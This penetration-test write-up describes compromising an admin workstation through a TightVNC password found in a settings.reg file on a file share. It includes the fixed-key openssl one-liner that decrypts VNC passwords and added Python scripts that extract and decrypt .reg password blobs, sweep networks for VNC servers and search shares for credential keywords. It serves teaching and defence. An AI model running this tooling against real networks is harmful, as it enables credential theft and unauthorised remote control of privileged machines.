Unsecured VNC Credentials Leads to Admin PAW Compromise


How discovering a VNC settings file on a file share during a penetration test led to compromising an admin privileged access workstation (PAW).

PAW (Privileged Access Workstation): a hardened device used only for administrative tasks. These systems typically have strict application and access controls, and everyday tasks such as browsing the internet and using email are not allowed on them.
VNC (Virtual Network Computing): a graphical desktop-sharing system used to remotely control another computer over the RFB protocol.

Attack Narrative

1. Find all the shares

Once I get past my Day 1 Assume Breach Methodology I begin working my way out into the network. The very first place I go is the file shares. Why?

Well, most organizations do not tightly control who has access to each file share. And I don’t necessarily blame them. It’s hard work to figure out exactly who needs access to what, and handle requests when people need access to places they don’t already have access to because it’s so restrictive. It can be a headache.

Unfortunately, because of this, an attacker on the network will be able to enumerate and discover all the places the organization likes to store their documents.

And as you know, it’s natural that sensitive documents are going to make their way out to file shares. That’s not inherently bad by itself. But like I said, since access is not strictly controlled this leads to unintended access to these files, many of which contain credentials.

To find all the shares, I do a couple of things. First, since I work from the client machine Assume Breach style, I go to This PC and look for mapped shares, and document those in my notes. Then I will look at the SYSVOL share for logon scripts and search those for file shares. I wrote a tool that does this for me, ScriptSentry. Lastly, I will use Find-DomainShare from PowerView to enumerate all of the shares in the environment. With the file shares now documented, I begin my exploration process.

2. Spelunk all the shares

The very first thing I like to do is use File Explorer’s search feature to search for some keywords. Things like passw, passwd, pwd, login, credential, etc. While I let that run I will begin manually exploring the file shares.

Then I like to just poke around. Click into folders and get a sense of the file structure and what types of documents and folders are out there. You’d be surprised what you can learn about the organization and the IT Admins from just poking around their file shares. I find that sometimes the folder naming conventions can give you an indication of where else to look for sensitive documents and/or unsecured credentials.

For example, many IT Admins create a “Tools” or “Utilities” folder where they store all their IT Admin tools. You know, things like Sysinternals tools, the EDR they deploy, RMM software, etc. These can be helpful from an attack perspective for a number of reasons. For example, imagine if these folders had misconfigured permissions that allow non-admins to modify the files within. I’ll leave that thought exercise up to the reader. 😃

3. Finding Unsecured VNC Credentials

During this process of exploring through file shares, I came across something interesting: a file with an ambiguous name, settings.reg. A .reg file is a Windows registry export, and TightVNC keeps its server configuration, stored passwords included, in the registry under HKLM\SOFTWARE\TightVNC\Server. I opened up this file and it looked something like this:

Interesting. The first thing I tried was to use CyberChef to convert the hex to ASCII to see if I could reveal the plaintext password.

But, no luck. Perhaps this hex string is encrypted? So I set off to Google and searched for “decrypt tight vnc password.” The very first search result was a GitHub repository that showed various ways to decrypt stored passwords. Down at the bottom of the readme was a handy little one-liner using openssl and hexdump.


echo -n d7a514d8c556aade | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Running the command above produces the following output:

00000000 53 65 63 75 72 65 21 00 |Secure!.|
00000008

A couple of things are worth knowing about that one-liner. The key, e84ad660c4721ae0, is not a secret recovered from the target: it is the fixed key that VNC implementations use to obfuscate stored passwords, so this is obfuscation rather than encryption, and anyone who can read the stored value can reverse it. Because the blob is a single 8-byte DES block and the IV is all zeros, -des-cbc here behaves exactly like DES-ECB, which is what VNC actually does. And on OpenSSL 3.x single DES has moved to the legacy provider, so the command needs -provider legacy -provider default added after enc, otherwise the cipher is reported as unavailable.

Cool, so it looks like I can take the encrypted hex I found and use this one-liner to decrypt the password to its plaintext. So that’s what I did and it worked!
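
To make the mechanics concrete, here is an added example (mine, not from the original post or from the repository mentioned above): a small Python script that pulls the REG_BINARY password values out of a TightVNC registry export like the settings.reg above, shows where the magic key in the one-liner comes from, and rebuilds the command for each blob. The registry export is a constructed sample; its Password bytes are the ones from the one-liner, and the ControlPassword bytes are a placeholder included to show the .reg line-continuation syntax. The script does not run DES itself; it hands that to openssl, and by default it emits the OpenSSL 3.x form with the legacy provider flags.

```python
import re

# Constructed sample of a TightVNC server registry export (the kind of settings.reg
# the post found). The Password bytes are the sample from the page's one-liner;
# the ControlPassword bytes are a made-up placeholder to show line continuation.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"RfbPort"=dword:0000170c
"Password"=hex:d7,a5,14,d8,c5,56,aa,de
"ControlPassword"=hex:00,11,22,33,\
  44,55,66,77
'''

TIGHTVNC_SERVER_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server"

# The obfuscation key as it appears in VNC's d3des-based vncpasswd code.
D3DES_KEY = bytes([23, 82, 107, 6, 35, 78, 88, 7])


def parse_reg_binary_values(reg_text):
    """Return {(key_path, value_name): bytes} for every hex: (REG_BINARY) value in a
    .reg export, joining byte lists that continue across lines with a trailing '\\'."""
    values, current_key = {}, None
    lines = iter(reg_text.splitlines())
    for line in lines:
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        m = re.match(r'^"([^"]+)"=hex:(.*)$', line)
        if not m or current_key is None:
            continue
        name, rest = m.group(1), m.group(2).strip()
        while rest.endswith("\\"):                      # continuation line follows
            rest = rest[:-1] + next(lines, "").strip()
        values[(current_key, name)] = bytes(int(b, 16) for b in rest.split(",") if b)
    return values


def tightvnc_password_blobs(values):
    """Pick out the two TightVNC secrets: Password (viewer access) and ControlPassword
    (the server's administrative interface). Each is a single 8-byte DES block."""
    return {name: blob for (key, name), blob in values.items()
            if key.lower() == TIGHTVNC_SERVER_KEY.lower()
            and name in ("Password", "ControlPassword")}


def standard_des_key(d3des_key=D3DES_KEY):
    """d3des consumes key bits in reverse order within each byte, so a standard DES
    implementation (openssl, pycryptodome) needs every byte bit-reversed. This is
    where the e84ad660c4721ae0 in the one-liner comes from."""
    return bytes(int(f"{b:08b}"[::-1], 2) for b in d3des_key)


def openssl_one_liner(blob, openssl3=True):
    """Rebuild the page's one-liner for a given 8-byte blob. OpenSSL 3.x moved single
    DES to the legacy provider, hence the two -provider flags."""
    if len(blob) != 8:
        raise ValueError("a VNC password blob is exactly one 8-byte DES block")
    providers = "-provider legacy -provider default " if openssl3 else ""
    return (f"echo -n {blob.hex()} | xxd -r -p | openssl enc -des-cbc {providers}"
            f"-nopad -nosalt -K {standard_des_key().hex()} -iv 0000000000000000 -d | hexdump -Cv")


def plaintext_from_block(decrypted):
    """VNC NUL-pads passwords to 8 bytes (the page's output is 'Secure!' plus 0x00)."""
    return decrypted.rstrip(b"\0").decode("latin-1")


if __name__ == "__main__":
    for name, blob in tightvnc_password_blobs(parse_reg_binary_values(SAMPLE_REG)).items():
        print(f"{name}: {blob.hex()}\n  {openssl_one_liner(blob)}")
```

Running it prints a ready-to-paste command per blob. The ControlPassword value matters in practice: on TightVNC it unlocks the server's administrative interface, and it is stored with the same fixed-key scheme as the viewer password.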

4. Using VNC Credentials

With the plaintext password in hand, I now needed to figure out where I could use it. I remembered from my Day 1 recon efforts that the host I was on had TightVNC server installed. I also knew that TightVNC server allows anyone with a VNC client and the VNC password to connect to the machine. So I opened up the VNC console and tried to access the administrative settings with the plaintext password I found.

Bingo! It works!

Now that I knew this password worked on my machine, I wondered whether the same password would work on other machines that had TightVNC server installed. To determine this, I first needed to find hosts where VNC was running, so I used PowerShell to do a port scan for TCP port 5900. Why 5900? Well, that’s one of the ports listed on the TightVNC website, of course. 😎 (5900 is the default RFB port that VNC viewers connect to; TightVNC’s other default, 5800, serves its browser-based viewer.)

So after running the port scan, I found 290+ machines with port 5900 open. Great! But now I needed to look through that list for interesting targets. Fortunately for me, and unfortunately for the client, one system stuck out because it had PAW in the computer name. All the other computer names were unremarkable.
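
The author did the 5900 sweep in PowerShell. As an added example (mine, not the author's script), here is the same idea in Python with one improvement a practitioner will want: instead of just reporting an open port, it reads the 12-byte RFB ProtocolVersion greeting that every VNC server sends as soon as a client connects, so an unrelated service squatting on 5900 is not mistaken for VNC. The listeners started by demo() are constructed stand-ins so the scanner can be tried offline; targets_in() expands a CIDR for the real thing.

```python
import ipaddress
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

VNC_PORT = 5900  # default RFB display port, the one the post scanned for


def _recv_exact(sock, n):
    """Read up to n bytes, stopping early only if the peer closes."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def probe_rfb(host, port=VNC_PORT, timeout=1.0):
    """TCP-connect to host:port and read the RFB ProtocolVersion greeting the
    server sends first, e.g. b"RFB 003.008\\n". Returns the version string
    ("003.008") or None if the port is closed, filtered, or not speaking RFB."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            greeting = _recv_exact(s, 12)
    except OSError:  # refused, timed out, unreachable, reset
        return None
    if len(greeting) != 12 or not greeting.startswith(b"RFB ") or greeting[11:] != b"\n":
        return None
    return greeting[4:11].decode("ascii", "replace")


def scan_for_vnc(targets, timeout=1.0, workers=64):
    """targets: iterable of (host, port). Returns {(host, port): version} for
    every target that answered with an RFB greeting."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda t: (t, probe_rfb(t[0], t[1], timeout)), targets))
    return {t: v for t, v in results if v is not None}


def targets_in(cidr, port=VNC_PORT):
    """Expand a CIDR into (host, port) targets, e.g. targets_in("10.10.0.0/24")."""
    return [(str(ip), port) for ip in ipaddress.ip_network(cidr, strict=False).hosts()]


def start_fake_listener(greeting):
    """Constructed stand-in for a remote host so the scanner can be exercised
    offline: listens on 127.0.0.1, sends `greeting` to each client, then closes.
    Returns the port it chose."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                if greeting:
                    conn.sendall(greeting)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Three local listeners: a VNC server, an SSH banner on a 'VNC' port, and one
    that accepts and hangs up. Only the first should be reported."""
    vnc = start_fake_listener(b"RFB 003.008\n")
    ssh = start_fake_listener(b"SSH-2.0-OpenSSH_9.6\r\n")
    silent = start_fake_listener(b"")
    found = scan_for_vnc([("127.0.0.1", p) for p in (vnc, ssh, silent)], timeout=2.0)
    return vnc, found


if __name__ == "__main__":
    port, found = demo()
    print(f"fake VNC on 127.0.0.1:{port} ->", found)
```

On a real engagement you would feed scan_for_vnc(targets_in("10.10.0.0/24")) and then resolve the hits back to computer names, which is where the PAW in this story stood out. Keep the worker count and timeout modest on a client network; 290 hosts answering on 5900 is a lot of connections to open at once.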

5. Compromising an Admin PAW

So I focused on that computer with PAW in the name. Since only the TightVNC server was installed on my foothold, I could not use it to connect to other machines; I needed a VNC client for that. Fortunately, there are plenty of free VNC clients, many of which do not require installation, so even if you’re on a machine without administrative rights you can still use this technique.

I already had RealVNC Viewer on my pentesting machine so I transferred the portable version over to the client machine.

Then I attempted to connect to the admin PAW using the plaintext password I found earlier and…

To my surprise, there was a user currently logged in to the machine. This meant that I was immediately dropped into their computer with an active session. To my additional surprise, this user was logged into an administrative console on their browser. That’s when I realized that this was in fact an administrator and based on my earlier recon efforts, I knew that this admin user was actually a member of Domain Admins. 😲

As you can imagine, with this access in hand, if I go unnoticed I can essentially do whatever I want. I can install a form of persistence so I can maintain access to the machine in the event that my VNC connection is closed. I can execute commands as this user, or any number of other things.

6. Wrapping Up The Attack

At this point, it’s a great opportunity to hit pause and let the client know what was found and what you’ve been able to do. I believe clients are very grateful for this communication and transparency. It also shows a high level of professionalism in your work because, just a reminder, our goal is not to get Domain Admin as fast as possible and call it a day. Our goal is to find vulnerabilities, validate those vulnerabilities, and advise on how to mitigate them. Just because we get some elevated access on day 1, day 2 or day 3 of a week or multi-week engagement doesn’t mean the job is done. Keep going!

Defensive Considerations

  • Don’t rely on VNC alone unless you can tightly control VNC connections, configure strong and unique passwords, put MFA in front of it, and log and monitor for suspicious behavior. How secure is VNC? Well, let’s look at some information on the TightVNC website: “Although TightVNC encrypts VNC passwords sent over the net, the rest of the traffic is sent as is, unencrypted (for password encryption, VNC uses a DES-encrypted challenge-response scheme, where the password is limited by 8 characters, and the effective DES key length is 56 bits). So using TightVNC over the Internet can be a security risk.” And as the decryption step in this story showed, the stored password is protected with a fixed, publicly known DES key, so anyone who can read the settings file or registry value has the password. My recommendation instead would be to use a more full-featured Remote Monitoring & Management (RMM) tool, something like ManageEngine, ConnectWise or NinjaOne.
  • Audit file shares for credential material on a regular basis. Start by manually searching file shares with File Explorer. Then work in some automation, with PowerShell perhaps. After you’ve eliminated the low-hanging fruit and have a process for reviewing shares regularly, then maybe look at a commercial offering for deeper inspection.
  • Restrict access to privileged access workstations (PAWs) from untrusted networks and devices. Using the built-in Windows Firewall, the firewall features of your endpoint security product, or any other tool you already have, implement restrictions so that even if a user wanted to, they could not connect from an untrusted network or device to an admin network or device. Access to PAWs should be deliberate and strictly controlled.
  • Implement detections for connections made from an untrusted network or device to an administrative network or device. This is the next step once the above is done. Using the tools you have, build alerts so that if a user from an untrusted network or device somehow reaches an admin network or device, you find out. In reality, for each PAW you should know exactly who should be logging into it and when; build detection rules and alerts around deviations from that.
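
As an added example (mine, not the author's), serving both the keyword search in step 2 and the audit recommendation above: a Python scanner that walks a share, flags files by filename keywords and by content patterns, and handles the one detail a naive grep misses for this exact case. regedit writes .reg exports as UTF-16, so the string "Password"=hex: is invisible to a byte search unless the file is transcoded first. The share tree built by build_sample_share() is constructed; the filenames, the ExampleOnly123 value and the pattern list are mine, with the filename keywords taken from the post.

```python
import re
import tempfile
from pathlib import Path

# Filename keywords from the post's search, plus a few file types that habitually
# carry credentials.
NAME_KEYWORDS = ("passw", "passwd", "pwd", "login", "credential", "secret",
                 ".reg", ".rdp", "unattend", "web.config")

# Content patterns. The second one is specific to a TightVNC registry export.
CONTENT_PATTERNS = {
    "password assignment": re.compile(rb"(?i)\b(password|passwd|pwd|secret)\s*[=:]\s*\S+"),
    "TightVNC password blob": re.compile(rb'(?i)"(Password|ControlPassword)"=hex:'),
    "connection string": re.compile(rb"(?i)\b(pwd|password)=[^;\s]+;"),
}


def readable_bytes(path, max_bytes):
    """Return file content as bytes worth grepping. regedit writes .reg files as
    UTF-16 with a BOM, which a byte grep would miss, so those are transcoded to
    UTF-8 first. Other files containing NULs are treated as binary (None)."""
    data = path.read_bytes()[:max_bytes]
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", "replace").encode("utf-8")
    return None if b"\0" in data else data


def scan_share(root, max_bytes=2_000_000):
    """Walk root; return {relative_posix_path: [reasons]} for files whose name or
    content looks like credential material."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        reasons = [f"name contains '{kw}'" for kw in NAME_KEYWORDS if kw in path.name.lower()]
        data = readable_bytes(path, max_bytes)
        if data is not None:
            reasons += [f"content matches {label}"
                        for label, pat in CONTENT_PATTERNS.items() if pat.search(data)]
        if reasons:
            hits[path.relative_to(root).as_posix()] = reasons
    return hits


def build_sample_share(root):
    """Constructed sample share, not client data. settings.reg is written as UTF-16
    the way regedit exports it; the other files are plain text."""
    root = Path(root)
    files = {
        "IT/Tools/settings.reg": ("utf-16",
            "Windows Registry Editor Version 5.00\r\n\r\n"
            "[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]\r\n"
            '"Password"=hex:d7,a5,14,d8,c5,56,aa,de\r\n'),
        "IT/Scripts/backup.ps1": ("utf-8", '$user = "svc_backup"\n$password = "ExampleOnly123"\n'),
        "HR/Policies/password_policy.txt": ("utf-8", "Passwords must be rotated every 90 days.\n"),
        "Finance/q3_report.txt": ("utf-8", "Revenue was up 4% quarter over quarter.\n"),
    }
    for rel, (enc, text) in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text, encoding=enc)
    return root


def demo():
    """Build the constructed share in a temp dir, scan it, return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_share(build_sample_share(tmp))


if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(rel, "->", "; ".join(reasons))
```

Point it at a mapped drive letter or a UNC path mount and expect noise: password_policy.txt is flagged on name alone, which is the right call for a first pass, since reviewing names is cheap and content hits like the .reg export and the PowerShell script are the ones to chase first. UTF-16 files without a BOM are skipped as binary; if your environment produces those, add a decode attempt for them.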

Conclusion

That’s all I’ve got this time. I hope you got value from this diary of a recent engagement of mine. If you did enjoy this and want to connect with like-minded cybersecurity and offensive security people, join me and the community we are creating on the Ethical Threat discord server. You can use this link to join 👉 https://discord.gg/NUJk6bSNuQ

Spencer Alessi

Pentester/recovering sysadmin Self-proclaimed Ethical Threat Active Directory Security Connoisseur Offensive stuff — securit360.com Host Cyber Threat POV — offsec.blog SWAG — swag.ethicalthreat.com
